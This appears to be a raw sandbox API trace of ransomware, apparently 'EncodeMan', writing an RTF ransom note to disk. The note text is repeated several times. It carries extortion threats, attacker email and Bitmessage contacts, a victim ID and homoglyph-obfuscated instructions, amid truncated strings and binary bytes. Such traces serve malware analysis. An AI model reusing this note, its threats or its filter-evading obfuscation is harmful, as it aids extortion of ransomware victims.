\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.263] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.264] CloseHandle (hObject=0x2e8) returned 1 [0285.264] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\#readme_eman#.rtf")) returned 0xffffffff [0285.264] GetLastError () returned 0x2 [0285.264] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0285.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 